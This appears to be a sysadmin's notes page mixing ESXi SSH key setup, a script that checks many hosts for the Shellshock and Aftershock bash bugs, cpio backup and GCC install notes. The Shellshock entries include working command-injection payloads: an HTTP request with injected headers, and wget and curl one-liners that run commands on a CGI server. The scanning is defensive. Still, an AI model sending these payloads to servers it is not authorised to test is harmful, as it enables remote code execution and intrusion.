esx 5 pubkeys

 To allow SSH access to ESXi/ESX hosts with public/private key authentication:  
 Generate public/private keys. 
 Notes  
 These instructions generate two files in ~/.ssh: id_rsa and id_rsa.pub.  
 In ESXi 5.x, the ssh-keygen command is located at /usr/lib/vmware/openssh/bin.  
 
On the remote host, store the public key content, id_rsa.pub in ~/.ssh/authorized_keys.  
 Notes  
 For ESXi 5.0, the location of authorized_keys is: /etc/ssh/keys-<username>/authorized_keys  
 More than one key can be stored in this file.  
 To allow root access, changePermitRootLogin no to PermitRootLogin yes in the /etc/ssh/sshd_config file.  
 To disable password login, ensure thatChallengeResponseAuthentication and PasswordAuthentication are set to no.  
 Reload the service:  
 For ESXi, run the command:  
 /etc/init.d/SSH restart  
 For ESX, run the command:  
 service sshd reload  

the shocker

sure... we have centralized everything. what we sysadmins do have are pubkeys all over the place. so how do we figure out how much of a pain patching for the many shellshock and aftershock systems that are on our networks? well crap. first is enumerate. yank the dns zone files, clean them up and feed them into:

shocking.sh

  #!/bin/bash   
datestamp=$(date +"%m-%d-%Y")
  for ip_addr in $(cat strippedzonefile) ; do   
  ping -q -c 1 $ip_addr &&   
  bash -c "   
   echo \" *** $ip_addr *** \" >> output ;   
   scp -B theshocker.sh root@$ip_addr:/root/ >> output ;   
   ssh -v -o ConnectTimeout=1 -o BatchMode=yes -o ConnectionAttempts=1 \  
      -o PasswordAuthentication=no root@$ip_addr \  
       /bin/bash -c /root/theshocker.sh >> output ;   
   echo \"done\"   
  "   
  done   
cat output | mail -s "shellshock and aftershock report $datestamp" you@somewhere

which scp's and executes theshocker.sh

 #!/bin/sh  
 SHELLSHOCK=`env x='() { :;}; echo true' /bin/bash -c "" 2>/dev/null`  
 AFTERSHOCK=`env var='() {(a)=>\' /bin/bash -c "echo date | grep -v date" 2>/dev$`  
 if [ -n "$SHELLSHOCK" ]  
 then  
 echo "cve-2014-6271 vulnerability detected - shellshock";  
 else  
 echo "cve-2014-6271 not detected - shellshock"  
 fi  
 if [ -n "$AFTERSHOCK" ]  
 then  
 echo "cve-2014-7169 vulnerability detected - aftershock";  
 else  
 echo "cve-2014-7169 not detected - aftershock"  
 fi  

which outputs to output:

*** 192.168.6.199 ***
cve-2014-6271 vulnerability detected - shellshock
cve-2014-7169 vulnerability detected - aftershock
 *** 192.168.6.20 ***
 *** 192.168.6.21 ***

you get the picture.

zone file to happy ips

grep -E "192\.168\.(13[6-9]|14[0-2])\.[0-9]{1,3}" db.aname.zone | sort | uniq > finessed

thanks f5

GET / HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17 10.1.1.1
Host:() { :; }; ls -la 
Referer: () { :; }; ping -c 23 10.1.1.1

with a rusty spoon

well kids. this just sucks donkey balls. get shell and issue:

 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  

if you see vulnerable you're in a bad trip.
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:

 wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi  

and better.

curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.

simple cpio script

rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.

#!/bin/sh
echo start "$(date)" >> /var/log/cpio.log ;
find /home/ -depth -print0 | cpio -0pdumv /nfs/mount ;
echo end "$(date)" >> /var/log/cpio.log ;

install gcc notes

1) Get the desired version from SVN, e.g. from svn://gcc.gnu.org/svn/gcc/tags/gcc_3_4_6_release
(To install SVN, see how to Work with SVN) 

2) Check to make sure install.sh, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:

me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .

3) Sample config for SUSE 10 Linux, x86_64

me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local
            --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64
            --enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0
            --enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64
            --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind
            --with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here: http://gcc.gnu.org/install/

or...

1) Search for an rpm package for your specific OS, e.g.:

http://rpm.pbone.net/index.php3/stat/3/srodzaj/1/search/gcc34

2) You can make a symbolic link to the newly uploaded gcc in /usr/bin